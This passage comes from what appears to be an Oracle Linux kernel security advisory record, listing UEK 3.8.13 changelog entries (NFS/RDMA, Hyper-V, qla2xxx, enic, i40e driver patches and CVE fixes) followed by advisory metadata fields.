\r\n- kvm: x86: fix emulator buffer overflow (CVE-2014-0049) (Andrew Honig) [Orabug: 18681519] {CVE-2014-0049} \r\n- ib_core: fmr pool hard lock up when cache enabled (Shamir Rabinovitch) [Orabug: 18408531] \r\n- bnx2x: disable PTP clock support (Jerry Snitselaar) [Orabug: 18605376] \r\n- x86, mm: Revert back good_end setting for 64bit (Brian Maly) [Orabug: 17648536] \r\n- IB/sdp: disable APM by default (Shamir Rabinovitch) [Orabug: 18443201] \r\n- vxlan: kernel panic when bringing up vxlan (Venkat Venkatsubra) [Orabug: 18295741] \r\n- ocfs2: call ocfs2_update_inode_fsync_trans when updating any inode (Darrick J. Wong) [Orabug: 18257094] \r\n- ocfs2: improve fsync efficiency and fix deadlock between aio_write and sync_file (Darrick J. Wong) [Orabug: 18257094] \r\n- Revert \"ocfs2: fix i_mutex deadlock between aio_write and sync_file\" (Jerry Snitselaar) [Orabug: 18257094] \r\n- config: align with rhck (Jerry Snitselaar) [Orabug: 18685975] \r\n- config: disable atmel drivers for ol7 (Jerry Snitselaar) [Orabug: 18665656] \r\n- config: enable support for squashfs features (Jerry Snitselaar) [Orabug: 18655723] \r\n- qla4xxx: Update driver verion to v5.04.00.05.06.02-uek3 (Tej Parkash) [Orabug: 18552248] \r\n- net: ipv4: current group_info should be put after using. (Wang, Xiaoming) [Orabug: 18603519] {CVE-2014-2851} \r\n \n[3.8.13-32.el6uek] \r\n- mm / dtrace: Allow DTrace to entirely disable page faults. (Nick Alcock) [Orabug: 18412802] \r\n- mm: allow __get_user_pages() callers to avoid triggering page faults. (Nick Alcock) [Orabug: 18412802] \r\n- config: enable nfs client support for rdma (Jerry Snitselaar) [Orabug: 18560595] \r\n- NFS: Fix negative overflow in SETATTR timestamps (Chuck Lever) [Orabug: 18476361] \r\n- NFS: Transfer full int64 for NFSv4 SETATTR timestamps (Chuck Lever) [Orabug: 18476361] \r\n- NFS: Block file size updates during async READ (Chuck Lever) [Orabug: 18391310] \r\n- NFS: Use an RPC/RDMA long request for NFS symlink operations (Chuck Lever) [Orabug: 18261861] \r\n- SUNRPC: Support long RPC/RDMA requests (Chuck Lever) [Orabug: 18261861] \r\n- xprtrdma: Split the completion queue (Chuck Lever) [Orabug: 18560595] \r\n- xprtrdma: Make rpcrdma_ep_destroy() return void (Chuck Lever) [Orabug: 18560595] \r\n- xprtrdma: Simplify rpcrdma_deregister_external() synopsis (Chuck Lever) [Orabug: 18560595] \r\n- xprtrdma: Remove support for MEMWINDOWS registration mode (Chuck Lever) [Orabug: 18560595] \r\n- xprtrdma: Disable ALLPHYSICAL mode by default (Chuck Lever) [Orabug: 18560595] \r\n- xprtrdma: Remove BOUNCEBUFFERS memory registration mode (Chuck Lever) [Orabug: 18560595] \r\n- SUNRPC: RPC/RDMA must invoke xprt_wake_pending_tasks() in process context (Chuck Lever) [Orabug: 18560595] \r\n- xprtrdma: add separate Kconfig options for NFSoRDMA client and server support (Jeff Layton) [Orabug: 18560595] \r\n- NFS: incorrect \"port=\" value in /proc/mounts (Chuck Lever) [Orabug: 18560595] \r\n- NFS: advertise only supported callback netids (Chuck Lever) [Orabug: 18560595] \r\n- SUNRPC: remove KERN_INFO from dprintk() call sites (Chuck Lever) [Orabug: 18560595] \r\n- SUNRPC: Fix large reads on NFS/RDMA (Chuck Lever) [Orabug: 18560595] \r\n- fnic: Failing to queue aborts due to Q full cause terminate driver timeout (Simha) [Orabug: 18548644] \r\n- net: enic: include irq.h for irqreturn_t definitions (Josh Boyer) [Orabug: 18548634] \r\n- enic: Call dev_kfree_skb_any instead of dev_kfree_skb. (Eric W. Biederman) [Orabug: 18548634] \r\n- enic: Don't receive packets when the napi budget == 0 (Eric W. Biederman) [Orabug: 18548634] \r\n- net: enic: slight optimization of addr compare (dingtianhong) [Orabug: 18548634] \r\n- net: enic: remove unnecessary pci_set_drvdata() (Jingoo Han) [Orabug: 18548634] \r\n- driver/net: enic: update enic maintainers and driver (govindarajulu.v) [Orabug: 18548634] \r\n- driver/net: enic: Exposing symbols for Cisco's low latency driver (govindarajulu.v) [Orabug: 18548634] \r\n- driver/net: enic: Try DMA 64 first, then failover to DMA (govindarajulu.v) [Orabug: 18548634] \r\n- driver/net: enic: record q_number and rss_hash for skb (govindarajulu.v) [Orabug: 18548634] \r\n- driver/net: enic: Add multi tx support for enic (govindarajulu.v) [Orabug: 18548634] \r\n- drivers/net: enic: Generate notification of hardware crash (Neel Patel) [Orabug: 18548634] \r\n- drivers/net: enic: Add an interface for USNIC to interact with firmware (Neel Patel) [Orabug: 18548634] \r\n- drivers/net: enic: Adding support for Cisco Low Latency NIC (Neel Patel) [Orabug: 18548634] \r\n- drivers/net: enic: Move ethtool code to a separate file (Neel Patel) [Orabug: 18548634] \r\n- drivers/net: enic: release rtnl_lock on error-path (Konstantin Khlebnikov) [Orabug: 18548634] \r\n- enic: be less verbose about non-critical firmware errors (Stefan Assmann) [Orabug: 18548634] \r\n- enic: change sprintf() to snprintf() (Dan Carpenter) [Orabug: 18548634] \r\n- dtrace: implement omni-present cyclics (Kris Van Hees) [Orabug: 18323501] \r\n- Update .gitignore with generated SDT files. (Nick Alcock) [Orabug: 17851716] \r\n- dtrace: avoid unreliable entries in stack() output (Kris Van Hees) [Orabug: 18323450] \r\n- drm/i915: hsw: replace !is_pch_edp() with port==PORT_A (Imre Deak) [Orabug: 18429992] \r\n- drm/i915: IVB/HSW have 32 fence register (Ville Syrjala) [Orabug: 18429992] \r\n- drm/i915: Configure GAM_ECOCHK appropriatly for Gen7 (Ville Syrjala) [Orabug: 18429992] \r\n- drm/i915: use lower aux clock divider on non-ULT HSW (Jani Nikula) [Orabug: 18429992] \r\n- drm/i915: HSW PM Frequency bits fix (Rodrigo Vivi) [Orabug: 18429992] \r\n- drm/i915: there's no PIPESTAT on HAS_PCH_SPLIT platforms (Paulo Zanoni) [Orabug: 18429992] \r\n- drm/i915: there's no DSPPOS register on gen4+ (Paulo Zanoni) [Orabug: 18429992] \r\n- drm/i915: reorganize intel_lvds_supported (Paulo Zanoni) [Orabug: 18429992] \r\n- drm/i915: fix DSPADDR Gen check (Paulo Zanoni) [Orabug: 18429992] \r\n- drm/i915: there's no DSPADDR register on Haswell (Paulo Zanoni) [Orabug: 18429992] \r\n- drm/i915: there's no DSPSIZE register on gen4+ (Paulo Zanoni) [Orabug: 18429992] \r\n- drm/i915: Use cpu_transcoder for HSW_TVIDEO_DIP_* instead of pipe (Rodrigo Vivi) [Orabug: 18429992] \r\n- PM: intel_powerclamp: enable driver in defconfigs (Brian Maly) [Orabug: 18429987] \r\n- intel_powerclamp: Fix cstate counter detection. (Yuxuan Shui) [Orabug: 18429987] \r\n- thermal/intel_powerclamp: Add newer CPU models (Jacob Pan) [Orabug: 18429987] \r\n- PM: Introduce Intel PowerClamp Driver (Jacob Pan) [Orabug: 18429987] \r\n- tick: export nohz tick idle symbols for module use (Jacob Pan) [Orabug: 18429987] \r\n- x86/nmi: export local_touch_nmi() symbol for modules (Jacob Pan) [Orabug: 18429987] \r\n- ioatdma: disable RAID on non-Atom platforms and reenable unaligned copies (Brice Goglin) [Orabug: 18430022] \r\n- ioatdma: ioat3_alloc_sed can be static (Fengguang Wu) [Orabug: 18430022] \r\n- ioatdma: Adding write back descriptor error status support for ioatdma 3.3 (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: S1200 platforms ioatdma channel 2 and 3 falsely advertise RAID cap (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: Adding support for 16 src PQ ops and super extended descriptors (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: skip silicon bug workaround for pq_align for cb3.3 (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: Removing PQ val disable for cb3.3 (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: channel reset scheme fixup on Intel Atom S1200 platforms (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: Add 64bit chansts register read for ioat v3.3. (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: Adding PCI IDs for Intel Atom S1200 product family ioatdma devices (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: Adding Haswell devid for ioatdma (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: allow all channels to have irq coalescing support (Dave Jiang) [Orabug: 18430022] \r\n- ioatdma: make debug output more readable (Dave Jiang) [Orabug: 18430022] \r\n- ioat/dca: Update DCA BIOS workarounds to use TAINT_FIRMWARE_WORKAROUND (Alexander Duyck) [Orabug: 18430022] \r\n- dmaengine: ioat - fix spare sparse complain (Fengguang Wu) [Orabug: 18430022] \r\n- ioatdma: fix race between updating ioat->head and IOAT_COMPLETION_PENDING (Dave Jiang) [Orabug: 18430022] \r\n- ioat: remove chanerr mask setting for IOAT v3.x (Dave Jiang) [Orabug: 18430022] \r\n- PCI: Remove Intel Haswell D3 delays (Todd E Brandt) [Orabug: 18559933] \r\n- hyperv-fb: kick off efifb early (Gerd Hoffmann) [Orabug: 18276803] \r\n- hyperv-fb: add support for generation 2 virtual machines. (Gerd Hoffmann) [Orabug: 18276803] \r\n- vmbus: use resource for hyperv mmio region (Gerd Hoffmann) [Orabug: 18276803] \r\n- vmbus: add missing breaks (Gerd Hoffmann) [Orabug: 18276803] \r\n- Drivers: hv: fcopy_open() can be static (Fengguang Wu) [Orabug: 18276803] \r\n- Drivers: hv: Implement the file copy service (K. Y. Srinivasan) [Orabug: 18276803] \r\n- hv: Add hyperv.h to uapi headers (Bjarke Istrup Pedersen) [Orabug: 18276803] \r\n- Drivers: hv: Ballon: Make pressure posting thread sleep interruptibly (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Cleanup the packet send path (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Extract the mmio information from DSDT (K. Y. Srinivasan) [Orabug: 18276803] \r\n- add support for Hyper-V reference time counter (Vadim Rozenfeld) [Orabug: 18276803] \r\n- hyperv: enable framebuffer and keyboard drivers (Jerry Snitselaar) [Orabug: 18276803] \r\n- Drivers: hv: remove HV_DRV_VERSION (Olaf Hering) [Orabug: 18276803] \r\n- x86, hyperv: Move a variable to avoid an unused variable warning (H. Peter Anvin) [Orabug: 18276803] \r\ninclude (David Rientjes) [Orabug: 18276803] \r\n- x86, hyperv: Correctly guard the local APIC calibration code (K. Y. Srinivasan) [Orabug: 18276803] \r\n- x86, hyperv: Get the local APIC timer frequency from the hypervisor (K. Y. Srinivasan) [Orabug: 18276803] \r\n- x86: Correctly detect hypervisor (Jason Wang) [Orabug: 18276803] \r\n- x86, hyperv: Handle Xen emulation of Hyper-V more gracefully (K. Y. Srinivasan) [Orabug: 18276803] \r\n- X86: Handle Hyper-V vmbus interrupts as special hypervisor interrupts (K. Y. Srinivasan) [Orabug: 18276803] \r\n- X86: Add a check to catch Xen emulation of Hyper-V (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Input: hyperv-keyboard - pass through 0xE1 prefix (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Input: add a driver to support Hyper-V synthetic keyboard (K. Y. Srinivasan) [Orabug: 18276803] \r\n- [SCSI] storvsc: NULL pointer dereference fix (Ales Novak) [Orabug: 18276803] \r\n- [SCSI] storvsc: Increase the value of STORVSC_MAX_IO_REQUESTS (K. Y. Srinivasan) [Orabug: 18276803] \r\n- [SCSI] storvsc: Support FC devices (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Add the GUID fot synthetic fibre channel device (K. Y. Srinivasan) [Orabug: 18276803] \r\n- [SCSI] storvsc: Implement multi-channel support (K. Y. Srinivasan) [Orabug: 18276803] \r\n- [SCSI] storvsc: Update the storage protocol to win8 level (K. Y. Srinivasan) [Orabug: 18276803] \r\n- [SCSI] storvsc: Increase the value of scsi timeout for storvsc devices (K. Y. Srinivasan) [Orabug: 18276803] \r\n- [SCSI] storvsc: Handle dynamic resizing of the device (K. Y. Srinivasan) [Orabug: 18276803] \r\n- [SCSI] storvsc: Restructure error handling code on command completion (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: scsi: storvsc: Use the consolidated GUID definition (K. Y. Srinivasan) [Orabug: 18276803] \r\n- HID: hyperv: make sure input buffer is big enough (David Herrmann) [Orabug: 18276803] \r\n- HID: hyperv: convert alloc+memcpy to memdup (Thomas Meyer) [Orabug: 18276803] \r\n- Drivers: hid: hid-hyperv: Use consolidated GUID definitions (K. Y. Srinivasan) [Orabug: 18276803] \r\n- hyperv: Move state setting for link query (Haiyang Zhang) [Orabug: 18276803] \r\n- hyperv: Fix the carrier status setting (Haiyang Zhang) [Orabug: 18276803] \r\n- hyperv: Fix race between probe and open calls (Haiyang Zhang) [Orabug: 18276803] \r\n- hyperv: Fix the NETIF_F_SG flag setting in netvsc (Haiyang Zhang) [Orabug: 18276803] \r\n- Fix the VLAN_TAG_PRESENT in netvsc_recv_callback() (Haiyang Zhang) [Orabug: 18276803] \r\n- hyperv: Fix vlan_proto setting in netvsc_recv_callback() (Haiyang Zhang) [Orabug: 18276803] \r\n- hyperv: Fix a compiler warning in netvsc_send() (Haiyang Zhang) [Orabug: 18276803] \r\n- hyperv: Fix a kernel warning from netvsc_linkstatus_callback() (Haiyang Zhang) [Orabug: 18276803] \r\n- Drivers: net: hyperv: Use the consolidated GUID definition (K. Y. Srinivasan) [Orabug: 18276803] \r\n- hyperv-fb: add blanking support (Gerd Hoffmann) [Orabug: 18276803] \r\n- hyperv-fb: add pci stub (Gerd Hoffmann) [Orabug: 18276803] \r\n- drivers/video: add Hyper-V Synthetic Video Frame Buffer Driver (Haiyang Zhang) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Don't timeout during the initial connection with host (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Specify the target CPU that should receive notification (K. Y. Srinivasan) [Orabug: 18276803] \r\n- hyperv: Add support for physically discontinuous receive buffer (Haiyang Zhang) [Orabug: 18276803] \r\n- drivers: hv: Mark the function hv_synic_free_cpu() as static in hv.c (Rashika Kheria) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Fix a bug in channel rescind code (K. Y. Srinivasan) [Orabug: 18276803] \r\n- drivers: hv: Fix wrong check for synic_event_page (Felipe Pena) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Terminate vmbus version negotiation on timeout (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: util: Correctly support ws2008R2 and earlier (K. Y. Srinivasan) [Orabug: 18276803] \r\n- hv: vmbus: fix vmbus_recvpacket_raw() return code (Dan Carpenter) [Orabug: 18276803] \r\n- hv: Change variable type to bool (Peter Senna Tschudin) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Do not attempt to negoatiate a new version prematurely (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Fix a bug in the handling of channel offers (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Do not post pressure status if interrupted (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Fix a bug in the hot-add code (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: incorrect device name is printed when child device is unregistered (Fernando Soto) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Initialize the transaction ID just before sending the packet (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: util: Fix a bug in version negotiation code for util services (K. Y. Srinivasan) [Orabug: 18276803] \r\n- drivers: hv: allocate synic structures before hv_synic_init() (Jason Wang) [Orabug: 18276803] \r\n- drivers: hv: check interrupt mask before read_index (Jason Wang) [Orabug: 18276803] \r\n- drivers: hv: switch to use mb() instead of smp_mb() (Jason Wang) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Implement multi-channel support (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Fix a bug in get_vp_index() (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Fix a bug in hv_need_to_signal() (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Notify the host of permanent hot-add failures (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Support 2M page allocations for ballooning (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Permit Linux to specify hot-add alignment requirements (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: make local functions static (Wei Yongjun) [Orabug: 18276803] \r\n- Drivers: hv: Add a new driver to support host initiated backup (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Handle channel rescind message correctly (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Implement hot-add functionality (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Make the balloon driver not unloadable (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Execute hot-add code in a separate context (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Execute balloon inflation in a separate context (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Do not request completion notification (K. Y. Srinivasan) [Orabug: 18276803] \r\n- driver: hv: remove cast for kmalloc return value (Zhang Yanfei) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Use the new infrastructure for delivering VMBUS interrupts (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Prevent the host from ballooning the guest too low (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Add a parameter to delay pressure reporting (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: balloon: Make adjustments to the pressure report (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Use consolidated GUID definitions (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: vmbus: Consolidate all offer GUID definitions in hyperv.h (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Bind all vmbbus interrupts to the boot CPU (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: vmbus_flow_handler() can be static (Fengguang Wu) [Orabug: 18276803] \r\n- Drivers: hv: remove unused variable in vmbus_recvpacket_raw() (Wei Yongjun) [Orabug: 18276803] \r\n- Drivers: hv: Cleanup and consolidate reporting of build/version info (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Capture the host build information (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Implement flow management on the send side (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Enable protocol negotiation with win8 hosts (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Add a check to deal with spurious interrupts (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Handle vmbus interrupts concurrently on all cpus (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Manage event tasklets on per-cpu basis (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Get rid of unnecessary request for offers (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Get rid of the unused global signaling state (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Add code to distribute channel interrupt load (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Modify the interrupt handling code to support win8 and beyond (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Add state to manage incoming channel interrupt load (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Setup a mapping for Hyper-V's notion cpu ID (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Cleanup vmbus_set_event() to support win7 and beyond (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Manage signaling state on a per-connection basis (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Move vmbus version definitions to hyperv.h (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Change the signature of vmbus_set_event() (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Change the signature for hv_signal_event() (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Save and export negotiated vmbus version (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Extend/modify vmbus_channel_offer_channel for win7 and beyond (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Update the ring buffer structure to match win8 functionality (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Support handling multiple VMBUS versions (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Get rid of hv_get_ringbuffer_interrupt_mask() (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Optimize the signaling on the write path (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Optimize signaling in the read path (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Turn off batched reading for util drivers (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Add state to manage batched reading (K. Y. Srinivasan) [Orabug: 18276803] \r\n- Drivers: hv: Implement routines for read side signaling optimization (K. Y. Srinivasan) [Orabug: 18276803] \r\n- hv: hv_balloon: remove duplicated include from hv_balloon.c (Wei Yongjun) [Orabug: 18276803] \r\n- x86, kvm: Switch to use hypervisor_cpuid_base() (Jason Wang) [Orabug: 18276803] \r\n- x86: Introduce hypervisor_cpuid_base() (Jason Wang) [Orabug: 18276803] \r\n- x86, mm: Create slow_virt_to_phys() (Dave Hansen) [Orabug: 18276803] \r\n- x86, mm: Pagetable level size/shift/mask helpers (Dave Hansen) [Orabug: 18276803] \r\n- mm: export split_page() (K. Y. Srinivasan) [Orabug: 18276803] \r\n- x86, hyperv: HYPERV depends on X86_LOCAL_APIC (H. Peter Anvin) [Orabug: 18276803] \r\n- qla2xxx: Update the driver version to 8.07.00.08.39.0-k1. (Saurav Kashyap) [Orabug: 18524767] \r\n- qla2xxx: Remove ISP8044 ID from the pci table. (Saurav Kashyap) [Orabug: 18524767] \r\n- qla2xxx: Remove mapped vp index iterator macro dead code. (Himanshu Madhani) [Orabug: 18524767] \r\n- qla2xxx: Add MBC option for fast SFP data access. (Joe Carnuccio) [Orabug: 18524767] \r\n- qla2xxx: Fix ISPFX00 not displaying the correct FW version after FW update through sysfs Interface. (Armen Baloyan) [Orabug: 18524767] \r\n- qla2xxx: Fix beacon blink logic for ISP26xx/83xx. (Himanshu Madhani) [Orabug: 18524767] \r\n- qla2xxx: Don't check for firmware hung during the reset context for ISP82XX. (Tej Prakash) [Orabug: 18524767] \r\n- qla2xxx: Fixup looking for a space in the outstanding_cmds array in qla2x00_alloc_iocbs(). (Chad Dupuis) [Orabug: 18524767] \r\n- qla2xxx: Delay driver unload if there is any pending activity going on. (Sawan Chandak) [Orabug: 18524767] \r\n- qla2xxx: ISP27xx queue index shadow registers. (Joe Carnuccio) [Orabug: 18524767] \r\n- qla2xxx: ISP27xx firmware dump template spec updates (including T274). (Joe Carnuccio) [Orabug: 18524767] \r\n- qla2xxx: Reduce the time we wait for a command to complete during SCSI error handling. (Chad Dupuis) [Orabug: 18524767] \r\n- qla2xxx: Check the QLA8044_CRB_DRV_ACTIVE_INDEX register when we are not the owner of the reset. (Hiral Patel) [Orabug: 18524767] \r\n- qla2xxx: Clear loop_id for ports that are marked lost during fabric scanning. (Chad Dupuis) [Orabug: 18524767] \r\n- qla2xxx: Adjust adapter reset routine to the changes in firmware specification for ISPFx00. (Armen Baloyan) [Orabug: 18524767] \r\n- qla2xxx: Avoid escalating the SCSI error handler if the command is not found in firmware. (Chad Dupuis) [Orabug: 18524767] \r\n- qla2xxx: IOCB data should be copied to I/O mem using memcpy_toio. (Atul Deshmukh) [Orabug: 18524767] \r\n- qla2xxx: Use proper log message for flash lock failed error for ISP82XX. (Atul Deshmukh) [Orabug: 18524767] \r\n- qla2xxx: Remove configure VFs mailbox command call. (Chad Dupuis) [Orabug: 18524767] \r\n- qla2xxx: ISP8044 poll ipmdio bus timeout improvement. (Joe Carnuccio) [Orabug: 18524767] \r\n- qla2xxx: Poll during initialization for ISP25xx and ISP83xx. (Giridhar Malavali) [Orabug: 18524767] \r\n- qla2xxx: Fix build errors related to invalid print fields on some architectures. (Chad Dupuis) [Orabug: 18524767] \r\nfile for msleep declartion in qla_nx2.c file. (Atul Deshmukh) [Orabug: 18524767] \r\n- qla2xxx: Use proper log message for flash lock failed error. (Atul Deshmukh) [Orabug: 18524767] \r\n- qla2xxx: Decrease pci access for response queue processing for ISPFX00. (Armen Baloyan) [Orabug: 18524767] \r\n- qla2xxx: Use jiffies instead of struct timeval and gettimeofday(). (Atul Deshmukh) [Orabug: 18524767] \r\n- qla2xxx: Update entry type 270 to match spec update. (Joe Carnuccio) [Orabug: 18524767] \r\n- qla2xxx: Enable fw_dump_size for helga (Hiral Patel) [Orabug: 18524767] \r\n- qla2xxx: Remove unnecessary code from qlafx00_intr_handler (Hiral Patel) [Orabug: 18524767] \r\n- qla2xxx: Introduce fw_dump_flag to track fw dump progress (Hiral Patel) [Orabug: 18524767] \r\n- qla2xxx: Remove unnecessary delays from fw dump code path (Hiral Patel) [Orabug: 18524767] \r\n- qla2xxx: Track the process when the ROM_LOCK failure happens (Hiral Patel) [Orabug: 18524767] \r\n- qla2xxx: Correction to 27xx template entry types 256 and 258. (Joe Carnuccio) [Orabug: 18524767] \r\n- qla2xxx: Add 8044 serdes bsg interface. (Joe Carnuccio) [Orabug: 18524767] \r\n- qla2xxx: Fix P3P max debug ID. (Chad Dupuis) [Orabug: 18524767] \r\n- qla2xxx: Check for peg alive counter and clear any outstanding mailbox command. (Giridhar Malavali) [Orabug: 18524767] \r\n- qla2xxx: Support of new Helga minidump opcodes QLA8044_RDDFE(38), QLA8044_RDMDIO(39),QLA8044_POLLWR(40). (Pratik Mohanty) [Orabug: 18524767] \r\n- qla2xxx: Allow the next firmware dump if the previous dump capture fails for ISP8044. (Saurav Kashyap) [Orabug: 18524767] \r\n- qla2xxx: Add pci device id 0x2271. (Joe Carnuccio) [Orabug: 18524767] \r\n- qla2xxx: Issue abort command for outstanding commands during cleanup when only firmware is alive. (Giridhar Malavali) [Orabug: 18524767] \r\n- qla2xxx: Log when device state is moved to failed state. (Giridhar Malavali) [Orabug: 18524767] \r\n- qla2xxx: Fix sparse warnings in qla_mr.c (Armen Baloyan) [Orabug: 18524767] \r\n- qla2xxx: Correct operations for ISP27xx template types 270 and 271. (Joe Carnuccio) [Orabug: 18524767] \r\n- qla2xxx: Add and use 32Gbps FC-GS definitions. (Chad Dupuis) [Orabug: 18524767] \r\n- qla2xxx: Do not schedule reset when one is already active when receiving an invalid status handle. (Chad Dupuis) [Orabug: 18524767] \r\n- qla2xxx: Add IOCB Abort command asynchronous handling (Armen Baloyan) [Orabug: 18524767] \r\n- qla2xxx: Add ISP2701 to PCI ID table. (Sawan Chandak) [Orabug: 18524767] \r\n- Update qlge driver to v1.00.00.34 (Sucheta Chakraborty) [Orabug: 18552225] \r\n- [SCSI] hpsa: update driver version to 3.4.4-1 (Stephen M. Cameron) [Orabug: 18524766] \r\n- [SCSI] hpsa: fix bad endif placement in RAID 5 mapper code (Stephen M. Cameron) [Orabug: 18524766] \r\n- [SCSI] hpsa: Do not zero fields of ioaccel2 command structure twice (Stephen M. Cameron) [Orabug: 18524766] \r\n- [SCSI] hpsa: Add hba mode to the hpsa driver (Stephen M. Cameron) [Orabug: 18524766] \r\n- [SCSI] hpsa: remove unused struct request from CommandList (Stephen M. Cameron) [Orabug: 18524766] \r\n- [SCSI] hpsa: increase the probability of a reported success after a device reset (Tomas Henzl) [Orabug: 18524766] \r\n- [SCSI] hpsa: bring format-in-progress drives online when ready (Stephen M. Cameron) [Orabug: 18524766] \r\n- [SCSI] hpsa: remove unused kthread.h header (Stephen M. Cameron) [Orabug: 18524766] \r\n- bonding: Inactive slaves should keep inactive flag's value (zheng.li) [Orabug: 18345482] \r\n- dtrace: fix leaking psinfo objects (Kris Van Hees) [Orabug: 18383027] \r\n- xen/pvhvm: Support more than 32 VCPUs when migrating. (Konrad Rzeszutek Wilk) [Orabug: 18552664] \r\n- xen/microcode: Only load under initial domain. (Konrad Rzeszutek Wilk) [Orabug: 18379824] \r\n- audit: Make testing for a valid loginuid explicit. (Eric W. Biederman) [Orabug: 18346901] \r\n- audit: make validity checking generic (Eric Paris) [Orabug: 18346901] \r\n- audit: allow checking the type of audit message in the user filter (Eric Paris) [Orabug: 18346901] \r\n- i40e: enable CONFIG_I40E by default (Brian Maly) [Orabug: 18429973] \r\n- i40e: add kcompat calls (Brian Maly) [Orabug: 18429973] \r\n- i40e: include i40e in kernel proper (Jesse Brandeburg) [Orabug: 18429973] \r\n- i40e: debugfs interface (Jesse Brandeburg) [Orabug: 18429973] \r\n- i40e: init code and hardware support (Jesse Brandeburg) [Orabug: 18429973] \r\n- i40e: implement virtual device interface (Jesse Brandeburg) [Orabug: 18429973] \r\n- i40e: driver core headers (Jesse Brandeburg) [Orabug: 18429973] \r\n- i40e: driver ethtool core (Jesse Brandeburg) [Orabug: 18429973] \r\n- i40e: transmit, receive, and NAPI (Jesse Brandeburg) [Orabug: 18429973] \r\n- i40e: main driver core (Jesse Brandeburg) [Orabug: 18429973] \r\n- ocfs2: pass \"new\" parameter to ocfs2_init_xattr_bucket (Wengang Wang) [Orabug: 18447765] \r\n- qlcnic: make Kconfig", "cvss3": {}, "published": "2014-05-19T00:00:00", "type": "oraclelinux", "title": "Unbreakable Enterprise kernel security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0038", "CVE-2013-6383", "CVE-2013-7266", "CVE-2014-0196", "CVE-2014-2851", "CVE-2014-2309", 